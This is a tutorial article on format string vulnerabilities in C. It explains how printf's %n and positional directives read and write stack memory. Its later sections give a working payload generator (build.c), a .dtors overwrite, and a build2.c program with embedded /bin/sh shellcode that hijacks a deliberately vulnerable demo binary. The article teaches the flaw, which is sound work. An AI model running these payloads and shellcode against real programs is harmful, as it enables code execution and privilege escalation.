![[image of the authors]](../../common/images/FredCrisBCrisG.jpg) 
 
    Original in fr Frédéric Raynal, Christophe Blaess, Christophe Grenier
fr to en:Frédéric
en to en:Lorne Bailey
Christophe Blaess is an independent aeronautics engineer. He is a Linux fan and does much of his work on this system. He coordinates the translation of the man pages as published by the Linux Documentation Project.
Christophe Grenier is a 5th year student at the ESIEA, where he works as a sysadmin too. He has a passion for computer security.
Frédéric Raynal has been using Linux for many years because it doesn't pollute, it doesn't use hormones, MSG or animal by-products... only sweat and craft.
![[article illustration]](../../common/images/illustration183.gif) 
 
    Most security flaws come from bad configuration or laziness. This rule holds true for format strings.
Programs often need to handle null-terminated strings. Where in the program this happens is not important here. This vulnerability is, once again, about writing directly to memory. The data for the attack can come from stdin, files, etc. A single instruction is enough to display such a string:
printf("%s", str);
    However, a programmer can decide to save time and six bytes while writing only:
printf(str);
With "economy" in mind, this programmer opens a potential hole in his work. He is satisfied with passing a single string as an argument, which he simply wanted to display without any change. However, this string will be parsed to look for formatting directives (%d, %g...). When such a directive is found, the corresponding argument is fetched from the stack.
We will start by introducing the family of printf() functions. We expect everyone knows them, but perhaps not in detail, so we will deal with the lesser-known aspects of these routines. Then, we will see how to get the information needed to exploit such a mistake. Finally, we will show how all this fits together in a single example.
printf() : they told me a lie !
Let us start with what we all learned in our programming handbooks: most of the C input/output functions use data formatting, which means that one has to provide not only the data to read or write, but also how it should be displayed. The following program illustrates this:
/* display.c */
#include <stdio.h>
int main(void) {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);
  printf("char : %c %c\n", i, a);
}
Running it displays:
>>gcc display.c -o display
>>./display
int  : 64 97
char : @ a
The first printf() writes the value of the integer variable i and of the character variable a as int (this is done using %d), so a is displayed as its ASCII value. The second printf(), on the other hand, converts the integer variable i to the character whose ASCII code is 64, that is @.
Nothing new here: everything conforms to the many functions with a prototype similar to that of printf(). One string argument (const char *format) is used to specify the selected format; the optional arguments that follow supply the values to be formatted according to that string.
Most of our programming lessons stop there, providing a non-exhaustive list of possible formats (%g, %h, %x, the use of the dot character . to set the precision...). But there is another one that is never talked about: %n. Here is what the printf() man page says about it:
    "The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted."
Here is the most important point of this article: this directive makes it possible to write to the address held in a pointer argument, even when used in a display function!
Before continuing, let us say that this format also exists for
    functions from the scanf() and syslog()
    family.
We are going to study the use and the behavior of this format
    through small programs. The first, printf1, shows a
    very simple use:
/* printf1.c */
1: #include <stdio.h>
2: 
3: int main() {
4:   char *buf = "0123456789";
5:   int n;
6:   
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }
The first printf() call displays the string "0123456789" which contains 10 characters. The next %n format writes this value to the variable n:
>>gcc printf1.c -o printf1
>>./printf1
0123456789
n = 10
Let's slightly transform our program by replacing the printf() instruction on line 7 with the following one:
7:   printf("buf=%s%n\n", buf, &n);
Running this new program confirms our idea: the variable n is now 14 (10 characters from the buf string variable plus the 4 characters of the "buf=" constant string contained in the format string itself).
So, we know the %n format counts every character that appears in the format string. Moreover, as the printf2 program demonstrates, it counts even further:
/* printf2.c */
#include <stdio.h>
#include <string.h>   /* strlen() */
int main(void) {
  char buf[10];
  int n, x = 0;
  
  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %zu\n", strlen(buf));   /* strlen() returns a size_t */
  printf("n = %d\n", n);
  return 0;
}
The snprintf() function is used here to prevent buffer overflows. One would then expect the variable n to be at most 10:
>>gcc printf2.c -o printf2
>>./printf2
l = 9
n = 100
Strange? In fact, the %n format reports the number of characters that should have been written. This example shows that the truncation imposed by the size argument is ignored.
What really happens? The format string is fully expanded before being cut and copied into the destination buffer:
/* printf3.c */
#include <stdio.h>
#include <string.h>   /* strlen() */
int main(void) {
  char buf[5];
  int n, x = 1234;
  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %zu\n", strlen(buf));   /* strlen() returns a size_t */
  printf("n = %d\n", n);
  printf("buf = [%s] (%zu)\n", buf, sizeof buf);
  return 0;
}
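printf3 contains some differences compared to printf2: the buffer is reduced to 5 bytes, the precision in the format string is now 5, and the content of the buffer is displayed at the end.
>>gcc printf3.c -o printf3
>>./printf3
l = 4
n = 5
buf = [0123] (5)
The first two lines are not surprising. The last one illustrates the behavior of the printf() function:
1. the format string is expanded according to the directives it contains, which provides the string "00000\0";
2. the variables are then written where and how they should be, here by copying x. The string then looks like "01234\0";
3. finally, sizeof buf - 1 bytes from this string are copied into the buf destination string, which gives us "0123\0".
For more details, refer to the GlibC sources, and particularly vfprintf() in the ${GLIBC_HOME}/stdio-common directory.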
Before ending this part, let's add that it is possible to get the same results by writing the format string in a slightly different way. We previously used the format called precision (the dot '.'). Another combination of formatting instructions leads to an identical result: 0n, where n is the width of the number, and 0 means that the spaces should be replaced with 0 if the whole width is not filled.
Now that you know almost everything about format strings, and
    most specifically about the %n format, we will study
    their behaviors.
The stack and printf()
The next program will guide us all along this section to understand how printf() and the stack are related:
/* stack.c */
 1: #include <stdio.h>
 2: 
 3: int
 4: main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
 9:
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }
This program just copies an argument into the buffer character array. We take care not to overflow any important data (format strings are really more precise than buffer overflows ;-)
>>gcc stack.c -o stack
>>./stack toto
buffer : [toto] (4)
i = 1 (bffff674)
It works as we expected :) Before going further, let's examine what happens from the stack point of view when snprintf() is called at line 10.
Fig. 1 : the stack at the beginning of snprintf()
Figure 1 describes the state of the stack when the program enters the snprintf() function (we'll see that this is not quite true, but it gives an idea of what's happening). We don't care about the %esp register. It is somewhere below the %ebp register. As we have seen in a previous article, the first two values located at %ebp and %ebp+4 contain the respective backups of the %ebp and %eip registers. Next come the arguments of the function snprintf():
1. the destination address;
2. the number of characters to be copied;
3. the address of the format string argv[1], which also acts as data.
Lastly, the stack is topped off with the tmp array of 4 characters, the 64 bytes of the variable buffer and the i integer variable.
    The argv[1] string is used at the same time as
    format string and data. According to the normal order of the
    snprintf() routine, argv[1] appears
    instead of the format string. Since you can use a format string
    without format directives (just text), everything is fine :)
What happens when argv[1] also contains formatting directives? Normally, snprintf() interprets them as they are ... and there is no reason why it should act differently! But here, you may wonder what arguments are going to be used as data for formatting the resulting output string. In fact, snprintf() grabs data from the stack! You can see that from our stack program:
>>./stack "123 %x"
buffer : [123 30201] (9)
i = 1 (bffff674)
First, the "123 " string is copied into buffer. The %x asks snprintf() to translate the first value into hexadecimal. From figure 1, this first argument is nothing but the tmp variable which contains the \x01\x02\x03\x00 string. It is displayed as the 0x00030201 hexadecimal number because our x86 processor is little endian.
>>./stack "123 %x %x"
buffer : [123 30201 20333231] (18)
i = 1 (bffff674)
Adding a second %x enables you to go higher in the stack. It tells snprintf() to look for the next 4 bytes after the tmp variable. These 4 bytes are in fact the first 4 bytes of buffer. However, buffer contains the "123 " string, which can be seen as the 0x20333231 (0x20=space, 0x31='1'...) hexadecimal number. So, for each %x, snprintf() "jumps" 4 bytes further in buffer (4 because an unsigned int takes 4 bytes on x86 processors). This variable acts as a double agent: it is the destination being written to, and it also supplies the input data read for the format:
>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378 
         0x333837] (63)
i = 1 (bffff654)
Another format is occasionally useful when the order of the parameters must be changed (for instance, while displaying date and time). We add m$ right after the %, where m is an integer >0. It gives the position of the variable to use in the argument list (starting from 1):
/* explore.c */
#include <stdio.h>
#include <string.h>   /* memset(), strlen() */
int
main(int argc, char **argv) {
  char buf[12];
  memset(buf, 0, 12);
  snprintf(buf, 12, argv[1]);
  printf("[%s] (%d)\n", buf, strlen(buf));
}
The format using m$ enables us to go up where we want in the stack, as we could do using gdb:
>>./explore %1\$x
[0] (1)
>>./explore %2\$x
[0] (1)
>>./explore %3\$x
[0] (1)
>>./explore %4\$x
[bffff698] (8)
>>./explore %5\$x
[1429cb] (6)
>>./explore %6\$x
[2] (1)
>>./explore %7\$x
[bffff6c4] (8)
The character \ is necessary here to protect the $ and to prevent the shell from interpreting it. In the first three calls we visit the contents of the buf variable. With %4\$x, we get the saved %ebp register, and then with %5\$x, the saved %eip register (a.k.a. the return address). The last 2 results presented here show the value of the argc variable and the address held in argv (remember that char **argv means that argv points to an array of addresses).
This example illustrates that the provided formats enable us to go up within the stack in search of information, such as the return address of a function, some other address... However, we saw at the beginning of this article that we could write using functions of the printf() type: doesn't this look like a wonderful potential vulnerability?
Let's go back to the stack program:
>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
buffer : [döÿ¿000000000000000000000000000000000000000000000000
00000000000] (63)
i = 500 (bffff664)
We give as input string:
1. the i variable address;
2. a formatting instruction (%.496x);
3. a second formatting instruction (%n) which will write into the given address.
To determine the i variable address (0xbffff664 here), we can run the program twice and change the command line accordingly. As you can see, i has a new value :) The given format string and the stack organization make the snprintf() call look like:
snprintf(buffer,
         sizeof buffer,
         "\x64\xf6\xff\xbf%.496x%n",
         tmp,
         4 first bytes in buffer);
The first four bytes (containing the address of i) are written at the beginning of buffer. The %.496x format allows us to get rid of the tmp variable, which is at the beginning of the stack. Then, when the %n instruction is processed, the address used is that of i, taken from the beginning of buffer. Although the requested precision is 496, snprintf() writes at most 59 more characters (the buffer is 64 bytes long, 4 bytes have already been written, and one byte is kept for the terminating null). The value 496 is arbitrary, and is just used to manipulate the "byte counter". We have seen that the %n format saves the number of bytes that should have been written. This value is 496, to which we have to add the 4 bytes of the i address at the beginning of buffer. Therefore, we have counted 500 bytes. This value is written to the next address found in the stack, which is the address of i.
We can go even further with this example. To change
    i, we needed to know its address ... but sometimes the
    program itself provides it:
/* swap.c */
#include <stdio.h>
int main(int argc, char **argv) {
  int cpt1 = 0;
  int cpt2 = 0;
  int *addr_cpt1 = &cpt1;   /* pointers to the counters, stored on the stack */
  int *addr_cpt2 = &cpt2;
  printf(argv[1]);
  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);
}
Running this program shows that we can control the stack (almost) as we want:
>>./swap AAAA
AAAA
cpt1 = 0
cpt2 = 0
>>./swap AAAA%1\$n
AAAA
cpt1 = 0
cpt2 = 4
>>./swap AAAA%2\$n
AAAA
cpt1 = 4
cpt2 = 0
As you can see, depending on the argument, we can change either cpt1 or cpt2. The %n format expects an address, which is why we can't act directly on the variables (i.e. using %3$n (cpt2) or %4$n (cpt1)) but have to go through pointers. The latter are "fresh meat" with enormous possibilities for modification.
    
The examples presented so far were compiled with egcs-2.91.66 and glibc-2.1.3-22. However, you probably won't get the same results on your own box. Indeed, the functions of the *printf() type change from one glibc version to another, and the compilers do not carry out the same operations at all.
    The program stuff highlights these differences:
/* stuff.c */
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* memset(), strlen() */
int main(int argc, char **argv) {
  
  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";
  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);
  }
  memset(buffer, 0, sizeof buffer);
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
}
    The aaa and bbb arrays are used as
    delimiters in our journey through the stack. Therefore we know that
    when we find 424242, the following bytes will be in
    buffer. Table 1 presents the
    differences according to the versions of the glibc and
    compilers.
Tab. 1 : Variations around glibc

| Compiler | glibc | Display |
|---|---|---|
| gcc-2.95.3 | 2.1.3-16 | buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63) | 
| egcs-2.91.66 | 2.1.3-22 | buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63) | 
| gcc-2.96 | 2.1.92-14 | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63) | 
| gcc-2.96 | 2.2-12 | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63) | 
Next in this article, we will continue to use
    egcs-2.91.66 and the glibc-2.1.3-22 , but
    don't be surprised if you note differences on your machine.
While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.
With format strings, we have seen that we can reach anywhere (stack, heap, bss, .dtors, ...): we just have to say where and what to write, and %n does the job for us.
/* vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int helloWorld();
int accessForbidden();
int vuln(const char *format)
{
  char buffer[128];
  int (*ptrf)();
  memset(buffer, 0, sizeof(buffer));
  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);
  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
  
  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);
  return ptrf();
}
int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    exit(-1);
  }
  for(i=0;i<argc;i++)
    printf("%d %p\n",i,argv[i]);
  
  exit(vuln(argv[1]));
}
int helloWorld()
{
  printf("Welcome in \"helloWorld\"\n");
  fflush(stdout);
  return 0;
}
int accessForbidden()
{
  printf("You shouldn't be here \"accesForbidden\"\n");
  fflush(stdout);
  return 0;
}
    We define a variable named ptrf which is a pointer
    to a function. We will change the value of this pointer to run the
    function we choose.
First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:
>>./vuln "AAAA %x %x %x %x"
helloWorld() = 0x8048634
accessForbidden() = 0x8048654
before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37)
after : ptrf() = 0x8048634 (0xbffff5d4)
Welcome in "helloWorld"
>>./vuln AAAA%3\$x
helloWorld() = 0x8048634
accessForbidden() = 0x8048654
before : ptrf() = 0x8048634 (0xbffff5e4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048634 (0xbffff5e4)
Welcome in "helloWorld"
The first call here gives us what we need: 3 words (one word = 4
    bytes for x86 processors) separate us from the beginning of the
    buffer variable. The second call, with
    AAAA%3\$x as argument, confirms this.
Our goal is now to replace the value of the initial pointer ptrf (0x8048634, the address of the function helloWorld()) with the value 0x8048654 (address of accessForbidden()). We have to write 0x8048654 bytes (134514260 bytes in decimal, something like 128 MB). Not all computers can afford such a use of memory ... but the one we are using can :) It takes around 20 seconds on a dual-pentium 350 MHz:
>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n `
helloWorld() = 0x8048634
accessForbidden() = 0x8048654
before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
0000000000000] (127)
after : ptrf() = 0x8048654 (0xbffff5d4)
You shouldn't be here "accesForbidden"
What did we do? We just provided the address of ptrf (0xbffff5d4). The next format (%.134514256x) reads the first word from the stack, with a precision of 134514256 (we have already written 4 bytes from the address of ptrf, so we still have to write 134514260-4=134514256 bytes). Finally, we write the wanted value to the given address (%3$n).
However, as we mentioned, it isn't always possible to use 128MB buffers. The %n format expects a pointer to an integer, i.e. four bytes. It is possible to alter its behavior to make it point to a short int - only 2 bytes - thanks to the instruction %hn. We thus cut the integer we want to write into two parts. The largest value to write then fits in 0xffff bytes (65535 bytes). Thus, in the previous example, we transform the operation "writing 0x8048654 at the 0xbffff5d4 address" into two successive operations:
1. writing 0x8654 at the 0xbffff5d4 address;
2. writing 0x0804 at the 0xbffff5d4+2=0xbffff5d6 address.
However, %n (or %hn) counts the total number of characters written into the string. This number can only increase. First, we have to write the smaller of the two values. Then, the second formatting will only use the difference between the needed number and the first number written as precision. For instance, in our example, the first format operation will be %.2052x (2052 = 0x0804) and the second %.32336x (32336 = 0x8654 - 0x0804). Each %hn placed right after will record the right amount of bytes.
We just have to specify where to write to both %hn.
    The m$ operator will greatly help us. If we save the
    addresses at the beginning of the vulnerable buffer, we just have
    to go up through the stack to find the offset from the beginning of
    the buffer using the m$ format. Then, both addresses will
    be at an offset of m and m+1. As we use
    the first 8 bytes in the buffer to save the addresses to overwrite,
    the first written value must be decreased by 8.
Our format string looks like:
"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max -
      val. min.]x%[offset+1]$hn"
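The build program uses three arguments to create a format string: the address to overwrite, the value to write there, and the offset (counted in words) from the beginning of the vulnerable buffer.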
/* build.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
/**
   The 4 bytes where we have to write are placed that way :
   HH HH LL LL
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
 */
char* build(unsigned int addr, unsigned int value, 
      unsigned int where) {
  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128; 
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;
  char *buf;
  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom
  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);
  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
    exit(EXIT_FAILURE);
  }
  memset(buf, 0, length);
  /* let's build */
  if (valh < vall) {
    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */
         "%%.%hdx"            /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */
         "%%.%hdx"            /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */         
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */
         valh-8,              /* set the value for the first %hn */  
         where,               /* the %hn for the high part */        
                                                         
         vall-valh,           /* set the value for the second %hn */ 
         where+1              /* the %hn for the low part */               
         );
         
  } else {
     snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */
         "%%.%hdx"            /* set the value for the first %hn */    
         "%%%d$hn"            /* the %hn for the high part */          
                                                           
         "%%.%hdx"            /* set the value for the second %hn */   
         "%%%d$hn"            /* the %hn for the low part */           
         ,                                                     
         b3+2, b2, b1, b0,    /* high address */                       
         b3, b2, b1, b0,      /* low address */                        
                                                           
         vall-8,              /* set the value for the first %hn */    
         where+1,             /* the %hn for the high part */          
                                                           
         valh-vall,           /* set the value for the second %hn */   
         where                /* the %hn for the low part */
         );
  }
  return buf;
}
int
main(int argc, char **argv) {
  char *buf;
  if (argc < 4)   /* address, value and offset are all required */
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* address */
          strtoul(argv[2], NULL, 16),  /* value */
          atoi(argv[3]));              /* offset */
  
  fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;
}
The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let's check what we get now, without any memory troubles.
First, our simple example lets us guess the offset:
>>./vuln AAAA%3\$x
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664
before : ptrf() = 0x8048644 (0xbffff5d4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048644 (0xbffff5d4)
Welcome in "helloWorld"
It is always the same: 3. Since our program is designed to explain what happens, we already have all the other information we need: the addresses of ptrf and accessForbidden(). We build our buffer according to these:
>>./vuln `./build 0xbffff5d4 0x8048664 3`
adr : -1073744428 (bffff5d4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664
before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000
00000000] (127)
after : ptrf() = 0x8048644 (0xbffff5b4)
Welcome in "helloWorld"
Nothing happens! In fact, since we used a longer buffer than in the previous example in the format string, the stack moved (ptrf has gone from 0xbffff5d4 to 0xbffff5b4). Our values need to be adjusted:
>>./vuln `./build 0xbffff5b4 0x8048664 3`
adr : -1073744460 (bffff5b4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664
before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x8048664 (0xbffff5b4)
You shouldn't be here "accesForbidden"
We won!!!
We have seen that format bugs allow us to write anywhere. We will now look at an exploitation based on the .dtors section.
When a program is compiled with gcc, you can find a constructor section (named .ctors) and a destructor section (named .dtors). These sections contain pointers to functions to be carried out before entering the main() function and after exiting it, respectively.
    
/* cdtors.c */
#include <stdio.h>
void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));
int main() {
  printf("in main()\n");
}
void start(void) {
  printf("in start()\n");
}
void end(void) {
  printf("in end()\n");
}
Our small program shows that mechanism:
>>gcc cdtors.c -o cdtors
>>./cdtors
in start()
in main()
in end()
Each one of these sections is built in the same way:
>>objdump -s -j .ctors cdtors
cdtors: file format elf32-i386
Contents of section .ctors:
 804949c ffffffff dc830408 00000000 ............
>>objdump -s -j .dtors cdtors
cdtors: file format elf32-i386
Contents of section .dtors:
 80494a8 ffffffff f0830408 00000000 ............
We check that the indicated addresses match those of our functions (attention: the preceding objdump command gives the addresses in little endian):
>>objdump -t cdtors | egrep "start|end"
080483dc g F .text 00000012 start
080483f0 g F .text 00000012 end
So, these sections contain the addresses of the functions to run at the beginning (or the end), framed with 0xffffffff and 0x00000000.
Let us apply this to vuln by using the format string. First, we have to get the location in memory of these sections, which is really easy when you have the binary at hand ;-) Simply use objdump like we did previously:
>>objdump -s -j .dtors vuln
vuln: file format elf32-i386
Contents of section .dtors:
 8049844 ffffffff 00000000 ........
Here it is! We have everything we need now.
The goal of the exploitation is to replace the address of a function in one of these sections with the address of the function we want to execute. If those sections are empty, we just have to overwrite the 0x00000000 which indicates the end of the section. This will cause a segmentation fault afterwards: since the program no longer finds this 0x00000000, it takes the next value as the address of a function, which it probably is not.
In fact, the only interesting section is the destructor section (.dtors): we have no time to do anything before the constructor section (.ctors) is used. Usually, it is enough to overwrite the address placed 4 bytes after the start of the section (the start being the 0xffffffff): if the section is empty, this overwrites the 0x00000000; otherwise, it replaces the first function address stored there.
Let's go back to our example. We replace the 0x00000000 in section .dtors, placed at 0x8049848=0x8049844+4, with the address of the accessForbidden() function, already known (0x8048664):
>>./vuln `./build 0x8049848 0x8048664 3`
adr : 134518856 (8049848)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[JH%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = bffff694 (0xbffff51c)
helloWorld() = 0x8048648
accessForbidden() = 0x8048664
before : ptrf() = 0x8048648 (0xbffff434)
buffer = [JH0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
000] (127)
after : ptrf() = 0x8048648 (0xbffff434)
Welcome in "helloWorld"
You shouldn't be here "accesForbidden"
Segmentation fault (core dumped)
Everything runs fine: main(), then helloWorld(), and then exit. The destructor is then called. The section .dtors starts with the address of accessForbidden(). Then, since there is no other real function address, the expected coredump happens.
    We have seen simple exploits here. Using the same principle
    we can get a shell, either by passing the shellcode through
    argv[] or an environment variable to the vulnerable
    program. We just have to set the right address (i.e. the address of
    the eggshell) in the section .dtors.
Right now, we know how to explore the stack and how to write a chosen value to a chosen address.
However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).
The idea is based on recursive calls of the function
    exec*():
/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv) {
  char **env;
  char **arg;
  int nb = atoi(argv[1]), i;
  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;
  
  /* three slots: program name, counter, terminating null pointer */
  arg    = (char **) malloc(sizeof(char *) * 3);
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;
  /* printings */
  printf("*** argv %d ***\n", nb);
  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);
  }
  printf("\n");
  /* recall */
  if (nb == 0) 
    exit(0);
  execve(argv[0], arg, env);
}
    The input is an nb integer that the program will
    recursively calle itself nb+1 times: 
>>./argv 2
*** argv 2 ***
argv = 0xbffff6b4
arg = 0x8049828
argv[0] = 0xbffff80b (0xbffff6b4)
arg[0] = 0xbffff80b (0x8049828)
argv[1] = 0xbffff812 (0xbffff6b8)
arg[1] = 0x8049838 (0x804982c)

*** argv 1 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

*** argv 0 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)
We immediately notice that the addresses allocated for
    arg and argv no longer move after the
    second call. We are going to use this property in our exploit. We
    just have to change our build program slightly to make
    it call itself before calling vuln. This gives us the
    exact address of argv, and therefore of our shellcode:
/* build2.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}
int
main(int argc, char **argv) {
  
  char *buf;
  char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  if(argc < 3)
    return EXIT_FAILURE;
  if (argc == 3) {
    fprintf(stderr, "Calling %s ...\n", argv[0]);
    /* 32-bit x86 is assumed: a pointer fits in an unsigned int */
    buf = build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    execlp(argv[0], argv[0], buf, shellcode, argv[1], argv[2], NULL);
  } else {
    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* address */
        (unsigned int) argv[2],
        atoi(argv[4]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);
  }
  return EXIT_SUCCESS;
}
    The trick is that the program decides what to call from the number
    of arguments it received: with two arguments it re-executes itself,
    otherwise it calls vuln. To start our exploit, we just
    give build2 the address we want to write to and
    the offset. We don't have to give the value anymore since it is
    going to be evaluated by our successive calls.
To succeed, we need to keep the same memory layout
    between the different calls of build2 and then
    vuln (that is why we call the build()
    function, in order to use the same memory footprint):
>>./build2 0xbffff634 3
Calling ./build2 ...
adr : -1073744332 (bffff634)
val : -1073744172 (bffff6d4)
valh: 49151 (bfff)
vall: 63188 (f6d4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff88f
adr : -1073744332 (bffff634)
val : -1073743729 (bffff88f)
valh: 49151 (bfff)
vall: 63631 (f88f)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8
before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000
00000000000] (127)
after : ptrf() = 0xbffff88f (0xbffff634)
Segmentation fault (core dumped)
Why didn't this work? We said we had to build an exact copy of
    the memory layout between the two calls ... and we didn't do it!
    argv[0] (the name of the program) changed. Our program
    is first named build2 (6 bytes) and then vuln
    (4 bytes). There is a difference of 2 bytes, which is exactly
    the shift that you can notice in the example above. The address
    of the shellcode during the second call of build2 is
    given by sc=0xbffff88f, but the line for
    argv[2] in vuln gives
    2 0xbffff891: our 2 bytes. To solve this, it is enough
    to rename our build2 to a 4-letter name, e.g.
    bui2:
>>cp build2 bui2
>>./bui2 0xbffff634 3
Calling ./bui2 ...
adr : -1073744332 (bffff634)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
